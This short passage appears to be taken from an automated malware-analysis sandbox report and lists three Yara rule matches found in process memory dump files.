Source: Yara match File source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY